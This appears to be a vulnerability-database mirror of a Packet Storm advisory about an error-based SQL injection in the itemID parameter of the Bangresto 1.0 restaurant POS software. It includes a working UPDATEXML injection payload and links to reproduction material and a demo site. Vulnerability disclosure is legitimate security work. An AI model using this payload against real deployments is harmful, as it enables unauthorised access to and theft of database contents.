Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormNu11secur1tyPACKETSTORM:170271
HistoryDec 16, 2022 - 12:00 a.m.

Bangresta 1.0 SQL Injection

2022-12-1600:00:00
nu11secur1ty
packetstormsecurity.com
175
JSON
`## Title: Bangresto 1.0 SQLi  
## Author: nu11secur1ty  
## Date: 12.16.2022  
## Vendor: https://axcora.com/, https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html  
## Demo: https://axcora.my.id/bangrestoapp/start.php  
## Software: https://github.com/mesinkasir/bangresto  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto  
  
## Description:  
The `itemID` parameter appears to be vulnerable to SQL injection attacks.  
The payload ' was submitted in the itemID parameter, and a database  
error message was returned.  
The attacker can be stooling all information from the database of this  
application.  
  
## STATUS: CRITICAL Vulnerability  
  
[+] Payload:  
  
```MySQL  
---  
Parameter: itemID (GET)  
Type: error-based  
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)  
Payload: itemID=(UPDATEXML(2539,CONCAT(0x2e,0x7171767871,(SELECT  
(ELT(2539=2539,1))),0x7170706a71),2327))&menuID=1  
---  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto)  
  
## Proof and Exploit:  
[href](https://streamable.com/moapnd)  
  
## Time spent  
`00:30:00`  
`
JSON